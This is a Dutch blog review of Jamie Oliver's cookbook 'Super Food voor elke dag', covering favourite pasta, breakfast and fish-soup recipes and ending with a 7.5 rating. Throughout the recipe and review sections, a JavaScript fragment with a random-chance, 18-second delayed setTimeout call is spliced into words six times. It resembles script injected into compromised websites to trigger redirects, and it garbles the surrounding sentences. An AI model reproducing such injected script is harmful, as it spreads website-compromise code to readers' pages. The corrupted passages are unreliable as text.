Jamie Oliver’s Super Food voor elke dag

Dolblij was ik met mijn prijs van de postcodeloterij; U mag een kookboek uitzoeken! Fijn zo’n straatprijs en een week later lag ‘Jamies’s Super Food voor elke dag’ op de deurmat. Dit kookboek staat vol met recepten voor een healthier en happier leven. Ik nam een kijkje in dit kookboek en vertel je wat ik er van vindt!

Jamie’s Voorwoord

In eerste instantie dacht ik, daar heb je weer zo’n super food ding. Ik snap dat super foods gezond zijn, maar het is natuurlijk ook wel een beetje een hipe.

In de inleiding staat dat dit misschien wel het meest persoonlijke boek van Jamie Oliver is. En hij heeft er inmiddels wat op zijn naam staan. Om dit boek te kunnen schrijven heeft hij zijn huiswerk gedaan in wat hij noemt een ontdekkingsreis door de wereld van gezondheid en voeding. Hij verwoord dit in een quote waar ik me in herken, fantastisch!

“Van eten moet je genieten, je moet het delen en er een feestje van maken”

De Recepten

Het boek zit vol met gezonde recepten die uitgebalanceerd zijn en relatief eenvoudig om te maken. Doel van het boek om mensen te helpen om gezondere keuzes te maken over eten, waardoor je lekkerder in je vel gaat zitten.

De recepten zijn divers, van ontbijt, lunch dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot diner. Daarnaast wordt er veel over voeding verteld en wat deze voeding met je doet. Interessante informatie en op een fijne, lekker weglezende manier geschreven.

“Ook al pik je maar een paar ideeën uit dit boek op, het zal je kijk op voedsel veranderen”

Mijn Favoriete Recepten

Eiwitrijk brood belegideetjes, P70 – ontbijt

Hier zitten echt een paar hele lekkere combinaties bij om je boterham te beleggen zoals:

– Hüttekäse met zachtgekookt ei, paprikapoeder en lenteui

– Magere roomkaas met kersen en kaneel

– Hummus met granaatappelzaadjes en rucola

Pasta die je blij maakt met zoete dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaat, aubergine & Ricotta, P90 – Lunch

Ricotta bevat, vergeleken met andere kaassoorten erg weinig verzadigde vet, en het is rijk aan calcium, wat belangrijk is voor het behoud van gezonde, sterke tanden en botten.

Spaghetti met dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaten-olijvensaus, knoflookbrood en sardinestrooisel, P100 – Lunch

Dit gerecht lijkt me heerlijk om een keer te maken. Sardines bevatten naast eiwitten ook omega 3-vetzuren, en zitten boordevol vitaminen en mineralen zoals chloride, dat helpt bij een efficiënte spijsvertering.

Magere Carbonara spek, erwten, amandelen en basilicum, P108- Lunch

Ja het zijn vooral de pasta recepten die punten hebben gescoord. De bescheiden doperwt is een waardevolle bron van negen verschillende microvoedinssdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen, maar is vooral zeer rijk aan een vitamine B die bijdraagt een een gezonde hartfunctie.

Het recept bevat onder ander gezonde ingrediënten als volkoren pasta, doperwten, parmezaan, citroen, ei, spek en amandelen.

Verrukkelijke vissoep met makreel, mosselen, bouillon & Couscous, P204 – Diner

Zowel makreel als mosselen zitten boordevol selenium en jodium. Jodium stimuleert de schildklier en draagt daardoor bij aan een goede sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tofwisseling.

Review

Overal geef ik dit boek een ruime voldoende; een 7,5. Het is zeker de moeite waard om eens rustig de tijd te nemen voor dit boek en het ook echt te lezen. Vaak heb ik bij kookboeken de neiging om het alleen snel door te bladeren, plaatsjes en de titels van gerechten te bekijken. Het boek heeft uitnodigende productfodom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografie en prachtige sfeerbeelden. Vooral de pastagerechten en hoofdgerechten vallen bij mij in de smaak!

Het chia, havermout, noten, rogge en zaden gehalte is voor mij soms net even te veel. Zeker in het begin van het boek. Vanaf ‘diner’ heb ik hier minder moeite mee. Al is dit natuurlijk te verwachten in een boek over super foods. Als je hier wel dol op bent, kun je helemaal los met dit boek. Persoonlijk ben ik meer fan van Jamie Oliver boeken als ‘the naked chef’ en ‘Jamie’s Italië’.

Alle boeken van Jamie Oliver op een rijtje

 • The Naked Chef
 • The Naked Chef is terug
 • Happy Days met de Naked Chef
 • De basis van het koken
 • Jamie’s Dinners
 • Jamie’s Italië
 • Kook met Jamie
 • Thuis bij Jamie
 • Jamie’s kookrevolutie
 • Jamie’s Amerika
 • Jamie’s Reizen
 • Jamie in 30 minuten
 • Te gast bij Jamie
 • Jamie’s comfort food

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Jamie Oliver's Super Food voor elke dag"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.